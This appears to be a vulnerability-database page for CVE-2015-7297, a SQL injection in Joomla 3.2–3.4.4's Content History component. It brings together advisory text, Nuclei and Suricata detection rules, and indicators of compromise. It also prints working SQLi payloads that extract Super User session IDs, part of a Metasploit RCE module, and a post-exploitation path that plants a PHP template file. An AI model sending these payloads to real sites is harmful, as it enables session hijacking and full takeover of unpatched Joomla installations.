CVE-2015-7297
published 2015-10-29CVE-2015-7297: SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different…
PriorityP274high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
99.97%
100.0th percentile
SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different vulnerability than CVE-2015-7858.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
| joomla | joomla_! | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)↗
commandGET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)↗
path/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=↗
yara↗
id: CVE-2015-7297
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'- →Exploit targets the com_contenthistory component via the list[select] GET parameter with error-based or UNION-based SQL injection payloads. Look for HTTP GET requests to /index.php with option=com_contenthistory and a non-empty list[select] parameter. ↗
- →Post-exploitation involves creation of a random-named PHP file in a Joomla template directory via com_templates, then requesting it for RCE. Monitor for POST requests to /administrator/index.php?option=com_templates&task=template.createFile. ↗
- →The exploit checks for a 500 error response containing a backtick-wrapped table name matching the pattern `(.*)_ucm_history` to confirm vulnerability and extract the table prefix. ↗
- →Session hijacking is confirmed when the 500 error response body contains 'Duplicate entry' followed by a hex session ID. Monitor for this pattern in Joomla error responses. ↗
- ·The SQL injection payload uses error-based technique with updatexml() or floor(rand(0)*2) GROUP BY; the exact payload varies depending on the database configuration and table prefix, which is dynamically retrieved during exploitation. ↗
- ·Affected versions are Joomla 3.2 through 3.4.4 only; version 3.4.5 contains the security fix. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-66q2-64c3-859x: SQL injection vulnerability in Joomla! 3
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2015-7858 [HIGH] CWE-89 GHSA-66q2-64c3-859x: SQL injection vulnerability in Joomla! 3
SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different vulnerability than CVE-2015-7297.
GHSA
GHSA-5j7c-6v58-rh4x: SQL injection vulnerability in Joomla! 3
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2015-7297 [HIGH] CWE-89 GHSA-5j7c-6v58-rh4x: SQL injection vulnerability in Joomla! 3
SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different vulnerability than CVE-2015-7858.
VulnCheck
Joomla! Joomla! Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2015·CVSS 7.5
CVE-2015-7858 [HIGH] Joomla! Joomla! Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Joomla! Joomla! Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different vulnerability than CVE-2015-7297.
Affected: Joomla! Joomla!
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.sucuri.net/2015/10/joomla-sql-injection-attacks-in-the-wild.html
Exploit PoC: https://vulncheck.com/xdb/9eabb1cd63ab
Suricata
ET WEB_SPECIFIC_APPS Possible Joomla SQLi Attempt (CVE-2015-7297 CVE-2015-7857 CVE-2015-7858)
suricata·2015-10-22·CVSS 7.5
CVE-2015-7297 [HIGH] ET WEB_SPECIFIC_APPS Possible Joomla SQLi Attempt (CVE-2015-7297 CVE-2015-7857 CVE-2015-7858)
ET WEB_SPECIFIC_APPS Possible Joomla SQLi Attempt (CVE-2015-7297 CVE-2015-7857 CVE-2015-7858)
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible Joomla SQLi Attempt (CVE-2015-7297 CVE-2015-7857 CVE-2015-7858)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"option="; nocase; content:"view="; nocase; content:"list[select]="; nocase; fast_pattern; pcre:"/&list\[select\]=[^\r\n&]*(?:(?:S(?:HOW (?:C(?:UR(?:DAT|TIM)E|HARACTER SET)|(?:VARI|T)ABLES)|ELECT (?:FROM|USER))|U(?:NION SELEC|PDATE SE)T|DELETE FROM|INSERT INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO|\/\*.+\*\/)?/i"; http.header_names; to_lowercase; content:!"|0d 0a|refere
Exploit-DB
Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)
exploitdb·2015-11-23
CVE-2015-7858 Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)
Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "Joomla Content History SQLi Remote Code Execution",
'Description' => %q{
This module exploits a SQL injection vulnerability found in Joomla versions
3.2 up to 3.4.4. The vulnerability exists in the Content History administrator
component in the core of Joomla. Triggering the SQL injection makes it possible
to retrieve active Super User sessions. The cookie can be used to login to the
Joomla administrator backend. By creating a new template file containing our
payload, remote code execution is made possible.
},
'License
Metasploit
Joomla com_contenthistory Error-Based SQL Injection
metasploit
Joomla com_contenthistory Error-Based SQL Injection
Joomla com_contenthistory Error-Based SQL Injection
This module exploits a SQL injection vulnerability in Joomla versions 3.2 through 3.4.4 in order to either enumerate usernames and password hashes.
Metasploit
Joomla Content History SQLi Remote Code Execution
metasploit
Joomla Content History SQLi Remote Code Execution
Joomla Content History SQLi Remote Code Execution
This module exploits a SQL injection vulnerability found in Joomla versions 3.2 up to 3.4.4. The vulnerability exists in the Content History administrator component in the core of Joomla. Triggering the SQL injection makes it possible to retrieve active Super User sessions. The cookie can be used to login to the Joomla administrator backend. By creating a new template file containing our payload, remote code execution is made possible.
Nuclei
Joomla! Core SQL Injection
nuclei·CVSS 7.5
CVE-2015-7297 [HIGH] Joomla! Core SQL Injection
Joomla! Core SQL Injection
A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
Template:
id: CVE-2015-7297
info:
name: Joomla! Core SQL Injection
author: princechaddha
severity: high
description: A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Joomla! CMS.
remediation: |
Apply the latest security patches and updates provided by Joomla! to mitigate the SQL Injection vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2015-7297
- http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
-
Qualys
Protect Against the Joomla SQL Injection Vulnerability | Qualys
blogs_qualys·2015-10-28·CVSS 7.5
[HIGH] Protect Against the Joomla SQL Injection Vulnerability | Qualys
A few days ago, SpiderLabs researcher Osaf Orpani disclosed an important vulnerability targeting Joomla , one of the most popular Content Management Systems (CMS). By exploiting this vulnerability, researchers were able to remotely gain full administrative access to the CMS.
Joomla versions 3.2 to 3.4.4 are affected by this major security issue. Since the vulnerability targets the core of the CMS, all websites based on Joomla are vulnerable, whatever the modules used.
Vulnerabilities discovered by Orpani are:
CVE-2015-7297
CVE-2015-7857
CVE-2015-7858
Like WordPress did when its market-leading CMS was exposed to multiple vulnerabilities , Joomla has reacted by publishing a quick Security Fix version 3.4.5 , which we encourage you to apply immediately.
What that story doesn’t tell is
Qualys
Protect Against the Joomla SQL Injection Vulnerability | Qualys
blogs_qualys·2015-10-28·CVSS 7.5
[HIGH] Protect Against the Joomla SQL Injection Vulnerability | Qualys
A few days ago, SpiderLabs researcher Osaf Orpani disclosed an important vulnerability targeting Joomla, one of the most popular Content Management Systems (CMS). By exploiting this vulnerability, researchers were able to remotely gain full administrative access to the CMS.
Joomla versions 3.2 to 3.4.4 are affected by this major security issue. Since the vulnerability targets the core of the CMS, all websites based on Joomla are vulnerable, whatever the modules used.
Vulnerabilities discovered by Orpani are:
- CVE-2015-7297
- CVE-2015-7857
- CVE-2015-7858
Like WordPress did when its market-leading CMS was exposed to multiple vulnerabilities, Joomla has reacted by publishing a quick Security Fix version 3.4.5, which we encourage you to apply immediately.
What that story doesn’t tell is
Greynoiseio
NoiseLetter September 2024
blogs_greynoiseio
NoiseLetter September 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.htmlhttp://packetstormsecurity.com/files/134097/Joomla-3.44-SQL-Injection.htmlhttp://packetstormsecurity.com/files/134494/Joomla-Content-History-SQL-Injection-Remote-Code-Execution.htmlhttp://www.rapid7.com/db/modules/auxiliary/gather/joomla_contenthistory_sqlihttp://www.rapid7.com/db/modules/exploit/unix/webapp/joomla_contenthistory_sqli_rcehttp://www.securityfocus.com/bid/77295http://www.securitytracker.com/id/1033950https://www.exploit-db.com/exploits/38797/https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.htmlhttp://packetstormsecurity.com/files/134097/Joomla-3.44-SQL-Injection.htmlhttp://packetstormsecurity.com/files/134494/Joomla-Content-History-SQL-Injection-Remote-Code-Execution.htmlhttp://www.rapid7.com/db/modules/auxiliary/gather/joomla_contenthistory_sqlihttp://www.rapid7.com/db/modules/exploit/unix/webapp/joomla_contenthistory_sqli_rcehttp://www.securityfocus.com/bid/77295http://www.securitytracker.com/id/1033950https://www.exploit-db.com/exploits/38797/https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/
2015-10-29
Published